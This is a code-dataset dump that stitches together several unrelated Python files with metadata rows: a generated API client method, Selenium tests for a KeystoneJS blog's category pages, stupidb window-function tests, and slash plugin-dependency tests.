asynchronous HTTP request, please pass async_req=True
>>> thread = api.me_get_my_providers_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DomainListingAdminServiceV1ModelProviderResponse]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method me_get_my_providers" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'text/json', 'text/html', 'application/xml', 'text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/v1/me/providers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DomainListingAdminServiceV1ModelProviderResponse]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 36.77561
| 186
| 0.628598
| 860
| 7,539
| 5.248837
| 0.189535
| 0.037218
| 0.02171
| 0.031901
| 0.874169
| 0.865973
| 0.865973
| 0.84537
| 0.840053
| 0.840053
| 0
| 0.015045
| 0.285847
| 7,539
| 204
| 187
| 36.955882
| 0.823366
| 0.362913
| 0
| 0.757282
| 1
| 0
| 0.173864
| 0.056749
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048544
| false
| 0
| 0.038835
| 0
| 0.15534
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
816ec2ab2d0cc66c4d924dfeb05229d86bb2f06b
| 7,571
|
py
|
Python
|
LabReport/Lab4/show_post_of_category.py
|
Liu-Hong-De/Software_test
|
068bbadd7b6d369445994e16aea4289618337910
|
[
"Apache-2.0"
] | null | null | null |
LabReport/Lab4/show_post_of_category.py
|
Liu-Hong-De/Software_test
|
068bbadd7b6d369445994e16aea4289618337910
|
[
"Apache-2.0"
] | 1
|
2022-01-21T23:39:34.000Z
|
2022-01-21T23:39:34.000Z
|
LabReport/Lab4/show_post_of_category.py
|
Liu-Hong-De/Software_test
|
068bbadd7b6d369445994e16aea4289618337910
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class ShowPostOfCategory(unittest.TestCase):
# use the demo account to sign in
def setUp(self):
self.driver = webdriver.Chrome()
driver =self.driver
driver.implicitly_wait(20) # set a waiting time at most 20 seconds
driver.get("http://127.0.0.1:3000")
driver.find_element_by_xpath("//*[@id=\"navbar-collapse\"]/ul[2]/li[2]/a").click() # click the sign in button
time.sleep(1)
driver.find_element_by_name("email").send_keys("demo@keystonejs.com") # enter the email and password
driver.find_element_by_name("password").send_keys("demo")
time.sleep(1)
driver.find_element_by_xpath("//*[@id=\"signin-view\"]/div/div[1]/div/div[2]/form/button").click() # click to sign in
time.sleep(2)
# test show post of category success
def test_ShowPostOfCategorySuccess(self):
driver = self.driver
# create a category
driver.find_element_by_xpath("//*[@id=\"react-root\"]/div/main/div/div[2]/div/div[1]/div[2]/div[3]/span/a[2]").click()
time.sleep(1)
driver.find_element_by_name("name").send_keys("use selenium to create a category")
time.sleep(1)
try:
driver.find_element_by_class_name("css-h629qq").click()
except:
driver.find_element_by_class_name("css-nil").submit()
time.sleep(1)
driver.find_element_by_class_name("css-dmf4a8").click()
time.sleep(1)
# create a post
driver.find_element_by_css_selector("#react-root > div > header > nav.primary-navbar > div > ul.app-nav.app-nav--primary.app-nav--left > li.primary-navbar__item.primary-navbar__brand > a").click()
time.sleep(1)
driver.find_element_by_css_selector("#react-root > div > main > div > div.dashboard-groups > div > div:nth-child(1) > div.dashboard-group__lists > div:nth-child(1) > span > a.dashboard-group__list-create.octicon.octicon-plus").click()
time.sleep(1)
driver.find_element_by_name("name").send_keys("use selenium to create a post")
time.sleep(1)
try:
driver.find_element_by_class_name("css-h629qq").click()
except:
driver.find_element_by_class_name("css-nil").submit()
time.sleep(1)
driver.refresh()
time.sleep(1)
inputList = driver.find_elements_by_tag_name("input")
inputListData = []
[inputListData.append(input) for input in inputList if input.is_displayed()]
inputListData[2].send_keys("Published")
inputListData[2].send_keys(Keys.ENTER)
time.sleep(1)
inputListData[5].send_keys("use selenium to create a category")
time.sleep(1)
inputListData[5].send_keys(Keys.ENTER)
time.sleep(1)
driver.find_element_by_class_name("css-2960tt").click()
time.sleep(1)
# go to blog page
driver.find_element_by_css_selector("#react-root > div > header > nav.primary-navbar > div > ul.app-nav.app-nav--primary.app-nav--right > li:nth-child(1) > a").click()
time.sleep(1)
driver.find_element_by_link_text("Blog").click()
time.sleep(1)
driver.find_element_by_partial_link_text("category").click()
time.sleep(10)
assert "use selenium to create a post" in driver.find_element_by_css_selector("body > div > div.row > div.col-sm-8 > div.blog > article > div.media-body > h3 > a").text
# test show post of category failed
def test_ShowPostOfCategoryFailed(self):
driver = self.driver
# create a category
driver.find_element_by_xpath("//*[@id=\"react-root\"]/div/main/div/div[2]/div/div[1]/div[2]/div[3]/span/a[2]").click()
time.sleep(1)
driver.find_element_by_name("name").send_keys("use selenium to create a category")
time.sleep(1)
try:
driver.find_element_by_class_name("css-h629qq").click()
except:
driver.find_element_by_class_name("css-nil").submit()
time.sleep(1)
driver.find_element_by_class_name("css-dmf4a8").click()
time.sleep(1)
# create a post
driver.find_element_by_css_selector("#react-root > div > header > nav.primary-navbar > div > ul.app-nav.app-nav--primary.app-nav--left > li.primary-navbar__item.primary-navbar__brand > a").click()
time.sleep(1)
driver.find_element_by_css_selector("#react-root > div > main > div > div.dashboard-groups > div > div:nth-child(1) > div.dashboard-group__lists > div:nth-child(1) > span > a.dashboard-group__list-create.octicon.octicon-plus").click()
time.sleep(1)
driver.find_element_by_name("name").send_keys("use selenium to create a post")
time.sleep(1)
try:
driver.find_element_by_class_name("css-h629qq").click()
except:
driver.find_element_by_class_name("css-nil").submit()
time.sleep(1)
driver.refresh()
time.sleep(1)
inputList = driver.find_elements_by_tag_name("input")
inputListData = []
[inputListData.append(input) for input in inputList if input.is_displayed()]
inputListData[2].send_keys("Published")
inputListData[2].send_keys(Keys.ENTER)
time.sleep(1)
driver.find_element_by_class_name("css-2960tt").click()
time.sleep(1)
# go to blog page
driver.find_element_by_css_selector("#react-root > div > header > nav.primary-navbar > div > ul.app-nav.app-nav--primary.app-nav--right > li:nth-child(1) > a").click()
time.sleep(1)
driver.find_element_by_link_text("Blog").click()
time.sleep(1)
driver.find_element_by_partial_link_text("category").click()
time.sleep(10)
assert "No posts in the category use selenium to create a category" in driver.find_element_by_css_selector("body > div > div.row > div.col-sm-8 > div > h3").text
def tearDown(self):
driver = self.driver
# delete the post
driver.find_element_by_link_text("Admin UI").click()
time.sleep(1)
driver.find_element_by_css_selector("#react-root > div > main > div > div.dashboard-groups > div > div:nth-child(1) > div.dashboard-group__lists > div:nth-child(1) > span > a.dashboard-group__list-tile").click()
time.sleep(1)
driver.find_element_by_css_selector("#react-root > div > main > div > div > div:nth-child(2) > div > div:nth-child(1) > div > div > button").click()
time.sleep(1)
driver.find_element_by_class_name("css-12yx24t").click()
time.sleep(1)
driver.find_element_by_class_name("css-rd63ky").click()
time.sleep(1)
driver.find_element_by_class_name("css-t4884").click()
time.sleep(2)
# delete the category
driver.find_element_by_css_selector("#react-root > div > header > nav.secondary-navbar > div > ul > li:nth-child(3) > a").click()
time.sleep(1)
driver.find_element_by_css_selector("#react-root > div > main > div > div > div:nth-child(2) > div > div:nth-child(1) > div > div > button").click()
time.sleep(1)
driver.find_element_by_class_name("css-12yx24t").click()
time.sleep(1)
driver.find_element_by_class_name("css-rd63ky").click()
time.sleep(1)
driver.find_element_by_class_name("css-t4884").click()
time.sleep(2)
driver.close()
if __name__ == "__main__":
unittest.main()
| 50.139073
| 242
| 0.648131
| 1,079
| 7,571
| 4.339203
| 0.134384
| 0.100384
| 0.163392
| 0.182614
| 0.845792
| 0.828919
| 0.804998
| 0.792824
| 0.785775
| 0.785775
| 0
| 0.02365
| 0.212521
| 7,571
| 151
| 243
| 50.139073
| 0.761657
| 0.04504
| 0
| 0.8
| 0
| 0.1
| 0.310326
| 0.084685
| 0
| 0
| 0
| 0
| 0.015385
| 1
| 0.030769
| false
| 0.007692
| 0.030769
| 0
| 0.069231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
817f0c4b21cf9ad11d4488a6d0ae230cfcad5964
| 4,227
|
py
|
Python
|
stupidb/tests/test_navigation.py
|
mrcrnkovich/stupidb
|
4274f60b7f8f2455c0031c73e053964d4d3e3e1d
|
[
"Apache-2.0"
] | 43
|
2018-12-29T22:14:55.000Z
|
2022-03-17T03:38:16.000Z
|
stupidb/tests/test_navigation.py
|
mrcrnkovich/stupidb
|
4274f60b7f8f2455c0031c73e053964d4d3e3e1d
|
[
"Apache-2.0"
] | 102
|
2021-07-19T21:20:22.000Z
|
2022-03-22T02:57:02.000Z
|
stupidb/tests/test_navigation.py
|
mrcrnkovich/stupidb
|
4274f60b7f8f2455c0031c73e053964d4d3e3e1d
|
[
"Apache-2.0"
] | 3
|
2021-12-04T19:14:33.000Z
|
2022-01-08T17:28:36.000Z
|
from __future__ import annotations
from datetime import date
from typing import Mapping
from stupidb import Window, const, first, get, lag, last, lead, nth, over, select, table
from .conftest import Element, assert_rowset_equal
def test_first_last(t_rows: list[dict[str, Element]]) -> None:
window = Window.range(partition_by=[get("name")])
query = table(t_rows) >> select(
first_date=first(get("date")) >> over(window),
last_date=last(get("date")) >> over(window),
first_date_nulls=first(const(None)) >> over(window),
)
result = list(query)
expected = [
dict(
first_date=date(2018, 1, 1),
last_date=date(2018, 1, 7),
first_date_nulls=None,
),
dict(
first_date=date(2018, 1, 1),
last_date=date(2018, 1, 7),
first_date_nulls=None,
),
dict(
first_date=date(2018, 1, 1),
last_date=date(2018, 1, 7),
first_date_nulls=None,
),
dict(
first_date=date(2018, 1, 1),
last_date=date(2018, 1, 7),
first_date_nulls=None,
),
dict(
first_date=date(2018, 1, 2),
last_date=date(2018, 1, 4),
first_date_nulls=None,
),
dict(
first_date=date(2018, 1, 2),
last_date=date(2018, 1, 4),
first_date_nulls=None,
),
dict(
first_date=date(2018, 1, 2),
last_date=date(2018, 1, 4),
first_date_nulls=None,
),
]
assert_rowset_equal(result, expected)
def test_nth(t_rows: list[dict[str, Element]]) -> None:
query = table(t_rows) >> select(
nth_date=nth(get("date"), const(1))
>> over(Window.range(partition_by=[get("name")]))
)
result = list(query)
expected = [
dict(nth_date=date(2018, 1, 4)),
dict(nth_date=date(2018, 1, 4)),
dict(nth_date=date(2018, 1, 4)),
dict(nth_date=date(2018, 1, 4)),
dict(nth_date=date(2018, 1, 3)),
dict(nth_date=date(2018, 1, 3)),
dict(nth_date=date(2018, 1, 3)),
]
assert_rowset_equal(result, expected)
def test_nth_past_frame(t_rows: list[dict[str, Element]]) -> None:
query = table(t_rows) >> select(
nth_date=nth(get("date"), const(4000))
>> over(Window.range(partition_by=[get("name")]))
)
result = list(query)
expected = [
dict(nth_date=None),
dict(nth_date=None),
dict(nth_date=None),
dict(nth_date=None),
dict(nth_date=None),
dict(nth_date=None),
dict(nth_date=None),
]
assert_rowset_equal(result, expected)
def test_nth_past_frame_preceding_following(t_rows: list[dict[str, Element]]) -> None:
query = table(t_rows) >> select(
nth_date=nth(get("date"), const(4000))
>> over(
Window.range(
partition_by=[get("name")],
preceding=const(200),
following=const(1000),
)
)
)
result = list(query)
expected = [
dict(nth_date=None),
dict(nth_date=None),
dict(nth_date=None),
dict(nth_date=None),
dict(nth_date=None),
dict(nth_date=None),
dict(nth_date=None),
]
assert_rowset_equal(result, expected)
def test_lead_lag(t_rows: list[dict[str, Element]]) -> None:
window = Window.range(partition_by=[get("name")])
query = table(t_rows) >> select(
lead_date=lead(get("date"), const(1)) >> over(window),
lag_date=lag(get("date"), const(1)) >> over(window),
)
result = list(query)
expected: list[Mapping[str, Element]] = [
dict(lead_date=date(2018, 1, 4), lag_date=None),
dict(lead_date=date(2018, 1, 6), lag_date=date(2018, 1, 1)),
dict(lead_date=date(2018, 1, 7), lag_date=date(2018, 1, 4)),
dict(lead_date=None, lag_date=date(2018, 1, 6)),
dict(lead_date=date(2018, 1, 3), lag_date=None),
dict(lead_date=date(2018, 1, 4), lag_date=date(2018, 1, 2)),
dict(lead_date=None, lag_date=date(2018, 1, 3)),
]
assert_rowset_equal(result, expected)
| 31.080882
| 88
| 0.564467
| 570
| 4,227
| 3.982456
| 0.096491
| 0.109251
| 0.163877
| 0.177533
| 0.829956
| 0.814978
| 0.744934
| 0.744934
| 0.744934
| 0.662996
| 0
| 0.067572
| 0.285782
| 4,227
| 135
| 89
| 31.311111
| 0.684333
| 0
| 0
| 0.663934
| 0
| 0
| 0.011356
| 0
| 0
| 0
| 0
| 0
| 0.04918
| 1
| 0.040984
| false
| 0
| 0.040984
| 0
| 0.081967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81b15ab2ebd9e6ea648ebb18c81a4d26cb4583fe
| 19,342
|
py
|
Python
|
tests/test_plugin_dependency.py
|
kbh2o/slash
|
532b7e3acdf46103ece5b86f21c29f9b58587289
|
[
"BSD-3-Clause"
] | 70
|
2015-12-05T12:33:10.000Z
|
2022-03-03T04:56:58.000Z
|
tests/test_plugin_dependency.py
|
kbh2o/slash
|
532b7e3acdf46103ece5b86f21c29f9b58587289
|
[
"BSD-3-Clause"
] | 711
|
2015-10-06T11:01:48.000Z
|
2022-02-09T12:40:47.000Z
|
tests/test_plugin_dependency.py
|
kbh2o/slash
|
532b7e3acdf46103ece5b86f21c29f9b58587289
|
[
"BSD-3-Clause"
] | 37
|
2015-10-13T11:00:51.000Z
|
2022-02-08T07:28:11.000Z
|
import pytest
import slash.plugins
from .conftest import Checkpoint
from .utils import maybe_decorate
from slash.plugins import PluginInterface
from gossip.exceptions import CannotResolveDependencies
@pytest.mark.parametrize('needs_decorate_method', [True, False])
@pytest.mark.parametrize('provides_decorate_method', [True, False])
def test_needs_provides_plugin_name(needs_decorate_method, provides_decorate_method, checkpoint1, checkpoint2):
@slash.plugins.active # pylint: disable=abstract-method, unused-variable
@maybe_decorate(slash.plugins.needs('p'), not needs_decorate_method)
@autoname
class NeedsPlugin(PluginInterface):
@maybe_decorate(slash.plugins.needs('p'), needs_decorate_method)
def session_start(self):
checkpoint2()
@slash.plugins.active # pylint: disable=abstract-method, unused-variable
@maybe_decorate(slash.plugins.provides('p'), not provides_decorate_method)
@autoname
class ProvidesPlugin(PluginInterface):
@maybe_decorate(slash.plugins.provides('p'), provides_decorate_method)
def session_start(self):
checkpoint1()
slash.hooks.session_start() # pylint: disable=no-member
assert checkpoint1.timestamp < checkpoint2.timestamp
def test_provides_globally_needs_globally(checkpoint1, checkpoint2):
'''
Plugin A: Provides x at class level
Plugin B: Needs x at class level
'''
@slash.plugins.provides('x')
class PluginA(slash.plugins.interface.PluginInterface):
def get_name(self):
return 'plugin a'
def session_start(self):
checkpoint1()
def test_start(self):
pass
@slash.plugins.needs('x')
class PluginB(slash.plugins.interface.PluginInterface):
def get_name(self):
return 'plugin b'
def session_start(self):
checkpoint2()
def error_added(self, result, error): # pylint: disable=unused-argument
pass
for plugin_cls in [PluginA, PluginB]:
slash.plugins.manager.install(plugin_cls(), activate_later=True)
slash.plugins.manager.activate_pending_plugins()
slash.hooks.session_start() # pylint: disable=no-member
assert checkpoint1.timestamp < checkpoint2.timestamp
slash.plugins.manager.deactivate('plugin a')
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.session_start() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x'])
def test_provides_globally_needs_specific_hook(checkpoint1, checkpoint2):
'''
Plugin A: Provides x at class level
Plugin B: Needs x for specific hook
'''
@slash.plugins.provides('x')
class PluginA(slash.plugins.interface.PluginInterface):
def get_name(self):
return 'plugin a'
def session_start(self):
checkpoint1()
def test_start(self):
pass
class PluginB(slash.plugins.interface.PluginInterface):
def get_name(self):
return 'plugin b'
@slash.plugins.needs('x')
def session_start(self):
checkpoint2()
def error_added(self, result, error): # pylint: disable=unused-argument
pass
for plugin_cls in [PluginA, PluginB]:
slash.plugins.manager.install(plugin_cls(), activate_later=True)
slash.plugins.manager.activate_pending_plugins()
slash.hooks.session_start() # pylint: disable=no-member
assert checkpoint1.timestamp < checkpoint2.timestamp
slash.plugins.manager.deactivate('plugin a')
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.session_start() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x'])
def test_provides_globally_needs_specific_hook_which_does_not_exist_at_a(checkpoint2):
'''
Plugin A: Provides x at class level
Plugin B: Needs x for specific hook, this hook does not definied in A
Expectations:
Should work in the empty sense
all non-needing hooks should work, even when missing from A, the specific hook needs to happen in A before B.
'''
@slash.plugins.provides('x')
class PluginA(slash.plugins.interface.PluginInterface):
def get_name(self):
return 'plugin a'
def test_start(self):
pass
class PluginB(slash.plugins.interface.PluginInterface):
def get_name(self):
return 'plugin b'
@slash.plugins.needs('x')
def session_start(self):
checkpoint2()
def error_added(self, result, error): # pylint: disable=unused-argument
pass
for plugin_cls in [PluginA, PluginB]:
slash.plugins.manager.install(plugin_cls(), activate_later=True)
slash.plugins.manager.activate_pending_plugins()
slash.hooks.session_start() # pylint: disable=no-member
assert checkpoint2.called
slash.plugins.manager.deactivate('plugin a')
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.session_start() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x'])
def test_provides_specific_hook_needs_globally(checkpoint1, checkpoint2):
'''
Plugin A: Provides x on a specific hook
Plugin B: Needs x at class level
Expectations:
This case should fail, because logically the other hooks don't have anyone to provide X for them
'''
class PluginA(slash.plugins.interface.PluginInterface):
def get_name(self):
return 'plugin a'
@slash.plugins.provides('x')
def session_start(self):
checkpoint1()
def test_start(self):
pass
@slash.plugins.needs('x')
class PluginB(slash.plugins.interface.PluginInterface):
def get_name(self):
return 'plugin b'
def session_start(self):
checkpoint2()
def error_added(self, result, error): # pylint: disable=unused-argument
pass
for plugin_cls in [PluginA, PluginB]:
slash.plugins.manager.install(plugin_cls(), activate_later=True)
slash.plugins.manager.activate_pending_plugins()
slash.hooks.session_start() # pylint: disable=no-member
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.error_added(result=None, error=None) # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x'])
def test_provides_specific_hook_needs_globally_with_this_hook_only(checkpoint1, checkpoint2):
'''
Plugin A: Provides x on a specific hook
Plugin B: Needs x at class level, but only has one hook (the one provided by A)
'''
class PluginA(slash.plugins.interface.PluginInterface):
def get_name(self):
return 'plugin a'
@slash.plugins.provides('x')
def session_start(self):
checkpoint1()
def test_start(self):
pass
@slash.plugins.needs('x')
class PluginB(slash.plugins.interface.PluginInterface):
def get_name(self):
return 'plugin b'
def session_start(self):
checkpoint2()
for plugin_cls in [PluginA, PluginB]:
slash.plugins.manager.install(plugin_cls(), activate_later=True)
slash.plugins.manager.activate_pending_plugins()
slash.hooks.session_start() # pylint: disable=no-member
assert checkpoint1.timestamp < checkpoint2.timestamp
slash.plugins.manager.deactivate('plugin a')
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.session_start() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x'])
@pytest.mark.parametrize('needs_parent_level', [True, False])
@pytest.mark.parametrize('provides_parent_level', [True, False])
def test_provides_needs_with_inheritence_on_class_level(checkpoint, checkpoint1, checkpoint2, needs_parent_level, provides_parent_level):
'''
Plugin A: Provides x in class level (by it self or by inheritence)
Plugin b: Needs x in class level (by it self or by inheritence)
'''
# pylint: disable=abstract-method
@maybe_decorate(slash.plugins.provides('x'), provides_parent_level)
class PluginAParent(slash.plugins.interface.PluginInterface):
def test_start(self):
pass
@maybe_decorate(slash.plugins.provides('x'), not provides_parent_level)
class PluginA(PluginAParent):
def get_name(self):
return 'plugin a'
def session_start(self):
checkpoint1()
@maybe_decorate(slash.plugins.needs('x'), needs_parent_level)
class PluginBParent(slash.plugins.interface.PluginInterface):
def error_added(self, result, error): # pylint: disable=unused-argument
checkpoint()
@maybe_decorate(slash.plugins.needs('x'), not needs_parent_level)
class PluginB(PluginBParent):
def get_name(self):
return 'plugin b'
def session_start(self):
checkpoint2()
for plugin_cls in [PluginA, PluginB]:
slash.plugins.manager.install(plugin_cls(), activate_later=True)
slash.plugins.manager.activate_pending_plugins()
# session_start hook should be provided the PluginA.session_start method
slash.hooks.session_start() # pylint: disable=no-member
assert checkpoint1.timestamp < checkpoint2.timestamp
# error_added hook should be provided by empty registration of pluginA
slash.hooks.error_added(result=None, error=None) # pylint: disable=no-member
assert checkpoint.called
slash.plugins.manager.deactivate('plugin a')
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.session_start() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x'])
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.error_added() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x'])
# Ensure only hooks required by PluginB fails
slash.hooks.test_end() # pylint: disable=no-member
def test_provides_needs_in_both_inheritence_levels(checkpoint, checkpoint1, checkpoint2):
# pylint: disable=abstract-method
@slash.plugins.provides('x')
class PluginAParent(slash.plugins.interface.PluginInterface):
def test_start(self):
pass
@slash.plugins.provides('y')
class PluginA(PluginAParent):
def get_name(self):
return 'plugin a'
def session_start(self):
checkpoint1()
@slash.plugins.needs('x')
class PluginBParent(slash.plugins.interface.PluginInterface):
def error_added(self, result, error): # pylint: disable=unused-argument
checkpoint()
@slash.plugins.needs('y')
class PluginB(PluginBParent):
def get_name(self):
return 'plugin b'
def session_start(self):
checkpoint2()
for plugin_cls in [PluginA, PluginB]:
slash.plugins.manager.install(plugin_cls(), activate_later=True)
slash.plugins.manager.activate_pending_plugins()
# session_start hook should be provided the PluginA.session_start method
slash.hooks.session_start() # pylint: disable=no-member
assert checkpoint1.timestamp < checkpoint2.timestamp
# error_added hook should be provided by empty registration of pluginA
slash.hooks.error_added(result=None, error=None) # pylint: disable=no-member
assert checkpoint.called
slash.plugins.manager.deactivate('plugin a')
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.session_start() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x', 'y'])
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.error_added() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x', 'y'])
# Ensure only hooks required by PluginB fails
slash.hooks.test_end() # pylint: disable=no-member
def test_provides_needs_with_inheritence_on_method_level(checkpoint):
'''
Plugin A: Provides x in method level (by it self or by inheritence) to test_start & session_start
Plugin b: Needs x in method level (by it self or by inheritence) on test_start & session_start
'''
# pylint: disable=abstract-method
session_start_a = Checkpoint()
session_start_b = Checkpoint()
test_start_a = Checkpoint()
test_start_b = Checkpoint()
class PluginAParent(slash.plugins.interface.PluginInterface):
@slash.plugins.provides('x')
def test_start(self):
test_start_a()
class PluginA(PluginAParent):
def get_name(self):
return 'plugin a'
@slash.plugins.provides('x')
def session_start(self):
session_start_a()
class PluginBParent(slash.plugins.interface.PluginInterface):
@slash.plugins.needs('x')
def session_start(self):
session_start_b()
def error_added(self, result, error): # pylint: disable=unused-argument
checkpoint()
class PluginB(PluginBParent):
def get_name(self):
return 'plugin b'
@slash.plugins.needs('x')
def test_start(self):
test_start_b()
for plugin_cls in [PluginA, PluginB]:
slash.plugins.manager.install(plugin_cls(), activate_later=True)
slash.plugins.manager.activate_pending_plugins()
slash.hooks.session_start() # pylint: disable=no-member
assert session_start_a.timestamp < session_start_b.timestamp
slash.hooks.test_start() # pylint: disable=no-member
assert test_start_a.timestamp < test_start_b.timestamp
# error_added hook should not need anything
slash.hooks.error_added(result=None, error=None) # pylint: disable=no-member
assert checkpoint.called
slash.plugins.manager.deactivate('plugin a')
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.session_start() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x'])
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.test_start() # pylint: disable=no-member
slash.hooks.error_added(result=None, error=None) # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x'])
def test_provides_needs_with_child_overrides():
# pylint: disable=line-too-long
'''
| Hook Name | Plugin A | Plugin B |
|---------------+-------------------------------------------------------------------------+------------------------------------------------------------------------|
| session_start | Child Provides x in method level, overrides parent's empty registration | Needs x (Parent) & y (Child) in class level |
| test_start | Child Provides x in method level, overrides parent's real registration | Needs x (Parent) & y (Child) in class level |
| error_added | x is not provided, overrides parent's real registration | Needs x (Parent) & y (Child) in class level |
| test_end | x is not provided, overrides parent's empty registration | Needs x (Parent) & y (Child) in class level |
| session_end | Parent provides x, child provides y - both in class level | Needs x (Parent) & y (Child) in class level, z in (child) method level |
'''
# pylint: disable=abstract-method
session_start_a = Checkpoint()
session_start_b = Checkpoint()
test_start_a = Checkpoint()
test_start_b = Checkpoint()
@slash.plugins.provides('x')
class PluginAParent(slash.plugins.interface.PluginInterface):
def test_start(self):
test_start_a()
def error_added(self, result, error): # pylint: disable=unused-argument
pass
def session_end(self):
pass
@slash.plugins.provides('y')
class PluginA(PluginAParent):
def get_name(self):
return 'plugin a'
@slash.plugins.provides('x')
def session_start(self):
# Overrides empty registration of PluginAParent
session_start_a()
@slash.plugins.provides('x')
def test_start(self):
# Overrides "real" registration of PluginAParent
test_start_a()
def error_added(self, result, error): # pylint: disable=unused-argument
# Overrides "real" registration of PluginAParent
pass
def test_end(self):
# Overrides empty registration of PluginAParent
pass
@slash.plugins.needs('x')
class PluginBParent(slash.plugins.interface.PluginInterface):
def session_start(self):
session_start_b()
def error_added(self, result, error): # pylint: disable=unused-argument
pass
def test_start(self):
test_start_b()
def test_end(self):
pass
@slash.plugins.needs('y')
class PluginB(PluginBParent):
def get_name(self):
return 'plugin b'
@slash.plugins.needs('z')
def session_end(self):
pass
for plugin_cls in [PluginA, PluginB]:
slash.plugins.manager.install(plugin_cls(), activate_later=True)
slash.plugins.manager.activate_pending_plugins()
slash.hooks.session_start() # pylint: disable=no-member
assert session_start_a.timestamp < session_start_b.timestamp
slash.hooks.test_start() # pylint: disable=no-member
assert test_start_a.timestamp < test_start_b.timestamp
slash.hooks.error_added(result=None, error=None) # pylint: disable=no-member
slash.hooks.test_end() # pylint: disable=no-member
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.session_end() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['z'])
slash.plugins.manager.deactivate('plugin a')
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.session_start() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x', 'y'])
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.test_start() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x', 'y'])
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.error_added(result=None, error=None) # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x', 'y'])
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.test_end() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x', 'y'])
with pytest.raises(CannotResolveDependencies) as caught:
slash.hooks.session_end() # pylint: disable=no-member
assert caught.value.unmet_dependencies == set(['x', 'y', 'z'])
def autoname(plugin):
def get_name(self):
return type(self).__name__.lower()
plugin.get_name = get_name
return plugin
| 33.814685
| 168
| 0.668907
| 2,266
| 19,342
| 5.560018
| 0.066637
| 0.077149
| 0.044051
| 0.061672
| 0.888245
| 0.866497
| 0.821891
| 0.809032
| 0.796968
| 0.796968
| 0
| 0.002867
| 0.224537
| 19,342
| 571
| 169
| 33.873905
| 0.837122
| 0.2234
| 0
| 0.889535
| 0
| 0
| 0.023706
| 0.00447
| 0
| 0
| 0
| 0
| 0.090116
| 1
| 0.218023
| false
| 0.052326
| 0.017442
| 0.055233
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
81b33657547a44b5052f43438ac698b630eaded1
| 59,617
|
py
|
Python
|
autodiff/forward.py
|
D-Y-F-S/cs207-FinalProject
|
57270ccbf7db7f3c1f4deff97af67b3c962fb205
|
[
"MIT"
] | null | null | null |
autodiff/forward.py
|
D-Y-F-S/cs207-FinalProject
|
57270ccbf7db7f3c1f4deff97af67b3c962fb205
